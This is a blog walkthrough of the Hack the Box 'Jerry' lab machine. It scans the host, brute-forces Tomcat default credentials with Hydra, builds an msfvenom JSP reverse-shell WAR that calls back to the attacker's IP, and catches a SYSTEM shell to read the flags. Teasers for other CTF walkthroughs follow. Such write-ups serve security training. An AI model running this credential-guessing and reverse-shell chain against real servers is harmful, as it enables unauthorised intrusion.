Hack the Box - Jerry - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Jerry machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Jerry machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.107.214

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.107.214


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -sV -T4 -p8080 10.129.107.214

Only one port open, and the web-server on this host seems to be running Apache Tomcat on the default port. Let's take a look at the website in our web browser:

http://10.129.107.214:8080


We have an Apache Tomcat version number. When we try to navigate to the manager page at /manager/html we're ask for Basic Auth credentials, so we attempt to bruteforce default credentials for the service using Hydra:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.107.214:8080/manager/html


We get two hits, so we'll attempt to authenticate to the manager section via Basic Auth:

http://tomcat:s3cret@10.129.107.214:8080/manager/html/


 Finding a Way In

Now that we have manager access to Apache Tomcat, we can upload files to the web-server as long as the files are in .war format. We'll create a reverse shell file using MSFvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.86 LPORT=8080 -f war > HTBwinRev8080.war


Before we upload our malicious file, we'll setup our Netcat listener to catch our reverse shell:

sudo nc -nlvp 8080


Now to upload the malicious .war file to the server via the /manager/html page's Deploy section:

http://10.129.107.214:8080/manager/html






It appears that the Apache Tomcat service on this host was configured to run with SYSTEM privileges, so the reverse shell we received when we used the service to connect back to our attacking machine also has those privileges.

Capturing the User and Root Flags

Most Hack the Box Windows system User and Root flags are located in a user's \Desktop directory and in the Administrator user's \Desktop directory, respectively. However, the flag for this system are located in a directory named Flags inside of the Users\Administrator\Desktop directory.

type "C:\Users\Administrator\Desktop\Flags\2 for the price of 1.txt"


 Summary

After initial scans, we found that target webserver's Apache Tomcat service was using default credentials for its admin-equivalent account. After authentication, we were able to use the service's file upload feature to upload a malicious file to the server, and upon interaction with that file, we received a reverse shell into the system. Because the service had been misconfigured, the reverse shell we received on the target had elevated privileges, and we were able to access and capture our objective flag files.

Finish









Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more